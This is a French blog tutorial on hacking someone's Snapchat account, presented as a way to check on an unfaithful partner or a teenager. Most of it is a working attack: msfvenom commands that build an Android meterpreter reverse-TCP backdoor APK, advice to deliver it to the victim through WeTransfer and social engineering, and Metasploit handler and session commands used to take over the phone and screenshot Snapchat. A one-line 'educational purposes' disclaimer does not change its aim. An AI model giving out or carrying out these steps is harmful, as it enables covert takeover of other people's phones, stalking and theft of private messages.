Magazine High tech

Comment pirater un compte Snapchat ?

Publié le 31 mai 2021 par Ahmed El Jaouari @funinformatique

Comment pirater Snapchat ? Voici une question que la plupart des utilisateurs de Snapchat se posent. Comment pirater un compte Snapchat pour savoir si mon conjoint est infidèle ? Comment pirater le compte Snapchat de mon ados pour contrôler ce que fait sur son smartphone ?

Bref, tout le monde à une bonne excuse de vouloir pirater un compte Snapchat.

La première chose que fait l'internaute, c'est généralement d'essayer de trouver la réponse en faisant une recherche Google.

Devinez quoi ? Et bien, sur toute la première page de résultat, on trouve une grande liste d'arnaqueurs qui promettent de récupérer des vidéos, des photos et des journaux de chat de n'importe quel compte Snapchat.

Il y a des tas d'arnaques en tout genre sur la première page Google. Mais, désolé de vous dire que ces sites vous donne de faux espoirs.

Tous ces programmes sont créés dans le but de récupérer votre mot passe Snapchat, ou pour voler votre argent ou encore pour prendre le contrôle de votre smartphone.

Alors comment pirater un compte Snapchat ?

Un programme de piratage direct n'existe pas. En aucun cas, il n'y aura un miracle qui vous fera pirater une personne en deux minutes.

Cependant, il est impossible de garantir une sécurité à 100 %. N'importe quel système peut être piraté.

Donc pour vraiment pirater un compte Snapchat, il faut être patient et intelligent. Si vous voulez des outils spécialisés, vous pouvez par exemple vous orienter vers la distribution Kali Linux.

Pirater un Snapchat avec l'outil Metasploit

Remarque: Cet article est à but éducatif et préventif uniquement. Apprendre l'attaque pour mieux se protéger. Vous êtes le seul(e) responsable de vos actions, et aucune responsabilité de la part de l'instructeur ne sera engagée quant à la mauvaise utilisation du contenu enseigné.

Cette technique consiste a exploiter les failles du système Android, iOS ou des applications installés dedans.

Chaque jour, des nouvelles failles de sécurité sont découverte sur les systèmes Android et iOS. Ces failles sont exploitable et permettent ainsi à une personne de prendre le contrôle total d'un smartphone ou d'une tablette.

Pour exploiter ces failles, un pirate crée une fausse application Android malveillante et l'envoie à une victime. Une fois l'application est installée sur le smartphone de la victime, il est facile de prendre le contrôlé de son smartphone et pirater son compte Snapchat.

Pour cela, les pirates utilisent l'outil Metasploit disponible sur la distribution Linux Kali linux.

Metasploit, c'est quoi ?

Metasploit est un outil qui permet le développement et l'exécution d'exploits contre un appareil distante. Il contient des centaines d'exploits et permettront d'attaquer tout type de machines connecté à internet.

Si vous voulez tester cette méthode sur votre téléphone et vous avez un ordinateur sous Windows alors je vous conseille créer une machine virtuel faisant tourner Kali Linux. Pour cela, il suffit de télécharger VMware et une image de Kali Linux. Metasploit est déjà pré-installé dessus.

Pour plus détails, regardez ce tutoriel: comment installer Kali Linux sur une machine Windows.

Commandes Linux pour pirater Snapchat

Création de l'application Backdoor.apk

Apres l'installation de Kali Linux sur votre machine, ouvrez le terminal Kali Linux. Ensuite, nous allons créé le trojan APK (c'est l'application que nous allons envoyer à la cible).

Pour cela, tapez la commande suivante:

msfvenom -p android / meterpreter / reverse_tcp lhost = 192.168.1.4 lport = 4000> /home/backdoor.apk

et appuyez sur Entrée. Cela créera un l'application APK backdoor.apk dans le dossier.

N'oubliez pas de replacer LHOST avec votre propre adresse IP.
Comment pirater un compte Snapchat ?

Backdoor.apk est l'apk de piratage qui sera utilisé pour pirater le compte Snapchat d'une victime. Elle doit être installé sur le téléphone Android de la victime.

Vous pouvez envoyer ce fichier en utilisant divers sites Web de partage de fichiers comme Wetransfer (ce site Web ne nécessite pas d'enregistrement d'utilisateur).

Enfin, vous trouverez le backdoor.apk dans le répertoire Home.

Comment pirater un compte Snapchat ?

Configuration de l'application Backdoor.apk

Maintenant, il faut configurer cette application Backdoor.apk. Pour cela, nous allons ouvrir un autre terminal et lancer l'outil Metasploit.

Ensuite, tapez les commandes suivantes:

msfconsole (permet d'ouvrir l'outil métasploit)
use /multi/handler (permet de sélectionner l'exploit handler)
set payload android/meterpreter/reverse_tcp
set lhost votre_adresse_ip
exploit

Comment pirater un compte Snapchat ?

Voila le module est bien configuré, il reste maintenant d'envoyer l'APK à une victime en utilisant l' ingénierie sociale. Lorsque la victime installera l'application sur son mobile, Metasploit vous indiquera quelque chose comme ceci :

Comment pirater un compte Snapchat ?

Il ne nous reste plus qu'à ouvrir une session Meterpreter à distance sur le mobile de la victime :

msf > sessions -i 1
[*] Starting interaction with 1...

Nous avons désormais le contrôle total du smartphone. Par exemple : nous pouvons faire des captures d'écran de à distance de l'application Snapchat:

meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot snapchat.jpg

Conclusion

Pirater un compte Snapchat, n'est pas du tout une chose facile. Cette technique n'est pas fiable à 100%. Si la cible est bien protégé, vous n'aurez rien a faire.
J'espère qu'a travers ce tutoriel, vous avez bien compris comment fonctionne le piratage des applications Android ou iOS comme Snapchat.

Si vous avez des ajouts pour rendre cette page une base de donnée concernant Snapchat, n'hésitez pas à poster votre commentaire !


Retour à La Une de Logo Paperblog

A propos de l’auteur


Ahmed El Jaouari 25328 partages Voir son profil
Voir son blog

Magazines